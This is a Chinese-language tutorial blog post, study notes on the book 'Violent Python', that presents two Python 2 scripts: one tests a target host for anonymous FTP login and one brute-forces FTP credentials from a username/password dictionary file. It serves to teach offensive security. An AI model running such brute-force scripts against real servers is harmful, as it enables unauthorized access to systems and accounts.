Python黑客攻防(十四)暴力破解FTP口令
注:本篇文章为个人学习笔记仅供学习交流,请勿用于非法用途。
参考:《Python绝技:运用Python成为顶级黑客》。
前言:
从安全方面考虑,网站允许匿名FTP访问似乎是很疯狂的做法。然而,令人惊讶的是许多网站为此提供的正当理由却是:匿名FTP访问有助于网站访问软件更新。
在进行FTP密码暴力破解前,我们要先验证一下目标服务器是否允许FTP匿登录。
我们可以利用Python中的ftplib 库编写一个小脚本, 确定目标服务器是否允许匿名登录。anonLogin()函数接收的参数是一个主机名,并返回一个布尔值来描述该主机是不是提供匿名FTP 登录。具体的操作过程是,该函数尝试建立-一个匿名FTP连接。如果成功,则返回“true”。如果在建立连接的过程中函数抛出了一个异常,则返回“False”。
FTP扫描器
# coding=utf-8
import ftplib
def anonLogin(hostname):try:ftp = ftplib.FTP(hostname)ftp.login('anonymous', 'HackBG@123.com')print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'ftp.quit()return Trueexcept Exception, e:print '\n[-] ' + str(h1) + ' FTP Anonymous Logon Failed.'return False
hostname = '192.168.1.16' #目标主机IP
anonLogin(hostname)
结果
暴力破解:
虽然匿名访问是进入系统的方式之一,但攻击者也能成功地用偷来的用户名/密码访问合法的FTP服务器。FileZilla 之类的FTP客户端程序往往将密码以明文形式存储在配置文件中(Huang, 2011)。在默认位置中存储明文密码使得专门为此编写的恶意软件能够迅速窃取用户名密码。安全专家们在近期发现的恶意软件中也发现了窃取FTP密码的功能。更有甚者,HD Moore将一个名为get_filezilla _creds.rb 的脚本也集成在了新发布的Metasploit中,允许用户在获得目标控制权后可以快速寻找FTP密码。如果我们要暴力破解的某个用户名/密码对就在一个文本文件里会怎么样呢?为了演示我们的脚本,我们假设用户名/密码对是存储在一 个纯文本文件中的。
暴力破解FTP密码
# coding=utf-8
import ftplib
def bruteLogin(hostname, passwdFile):pF = open(passwdFile, 'r')for line in pF.readlines():username = line.split(':')[0]password = line.split(':')[1].strip('\r').strip('\n')print '[+] Trying: ' + username + '/' + passwordtry:ftp = ftplib.FTP(hostname)ftp.login(username, password)print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + passwordftp.quit()return (username, password)except Exception, e:passprint '\n[-] Could not brubrute force FTP credentials.'return (None, None)
host = '192.168.1.16' #目标IP
passwdFile = r'/home/kali/桌面/a.txt' #密码字典
bruteLogin(host, passwdFile)
测试结果
微信公众号:黑客帮
Python黑客攻防(十四)暴力破解FTP口令相关推荐
- Python黑客攻防(八)密码破解攻击
前言 进行黑客攻击通常需要做大量重复性工作.如果黑客直接通过浏览器攻击Web网站,就要不断手动修改输入值,并反复点击.但如果可以在应用程序内部访问Web网站并接收结果值,那么只需要使用简单的几行代码就 ...
- 黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第五章 WEB黑客(3)暴力破解目录与文件位置
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第五章 WEB黑客(3)暴力破解目录与文件位置 文章目录 黑帽python第二版(Black Hat P ...
- 黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第五章 WEB黑客(4)暴力破解HTML表单身份验证
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第五章 WEB黑客(4)暴力破解HTML表单身份验证 文章目录 黑帽python第二版(Black Ha ...
- python新建文件夹口令_3分钟学会一段Python代码脚本,轻松实现破解FTP密码口令...
很多关注我的小伙伴在上篇文章里学习到了如何利用python去破解加密的ZIP压缩文件,感觉很有意思,就有很多小伙伴问我有没有利用python脚本实现FTP服务器口令的暴力破解,今天小编就以此篇文章内容 ...
- 攻防世界illusion暴力破解
攻防世界illusion暴力破解 看算法是不可能看算法的,这辈子都不可能看算法的,汇编又不会,出题人又苟得一匹,加密算法就算每一行都看懂了也不知道整体函数是干嘛的,只有暴力破解这种东西才能维持生活. ...
- 暴力破解FTP服务器用户名密码
暴力破解FTP服务器用户名密码 破解 今天的例子很简单,就是用python的FTPLIB模块,登陆ftp服务器.并尝试用户名和密码. 大概的逻辑是,假设远程主机上有FTP服务器,我们使用用户和密码文件 ...
- python黑客攻防入门下载-Python键盘钩取的自我理解(来源于《Python黑客攻防入门》)...
最近从图书馆借到一本书<Python黑客攻防入门>,感觉里面的提供的代码模块对自己深有感触(主要我超菜),所以打算尝试写点小分析,希望大家能谅解本人的语言组织与技术分析. 希望有人来讨论. ...
- [Python人工智能] 三十四.Bert模型 (3)keras-bert库构建Bert模型实现微博情感分析
从本专栏开始,作者正式研究Python深度学习.神经网络及人工智能相关知识.前一篇文章开启了新的内容--Bert,首先介绍Keras-bert库安装及基础用法及文本分类工作.这篇文章将通过keras- ...
- 黑客开始利用云计算暴力破解密码
本文讲的是黑客开始利用云计算暴力破解密码[IT168 云计算频道]使用云计算服务来替代在公司里设立维护大量服务器,显然对节省企业的成本有利.不过现在看来从云计算服务中受惠最大的恐怕是黑客等群体,黑客们 ...
最新文章
- FEC(Forward Error Correction)前向纠错 UDP\RTP 中使用用于改善无线等网络丢包等问题--转...
- rsyslog+analyzer
- 基于jquery实现拆分姓名的方法
- MySQL Execution Plan--执行计划中的Type列
- JavaScript new对象的四个过程
- Linux的帧缓冲设备
- java判断对称素数_SM2非对称算法的原理及实现 Java SM2的代码案例 | 一生孤注掷温柔 | 小奋斗...
- element table滚动条占宽度_HTML table表格 固定表头 tbody加滚动条
- 流媒体直播系统由哪几部分组成?
- VS2015官方下载地址(个人免费版)
- table(单击行,把当行的单选按钮(radio)设为选中状态,并应用当前样式)
- python键盘键值表_Python怎么记录键盘鼠标敲击次数|Python统计鼠标点击次数 - PS下...
- PPT中一种类似手写的字体
- 转型产业互联网,新氧能否再造辉煌?
- 迈克尔逊干涉仪和光学计量学
- B站收藏 6.1w !GitHub 标星 3.9k !这门神课拯救了我薄弱的计算机基础
- 备案不用关闭网站的9种技巧
- mPush实战笔记3安装zookeeper
- 白话空间统计之四:P值和Z得分(中)
- 终端安全管理:守住最后的堡垒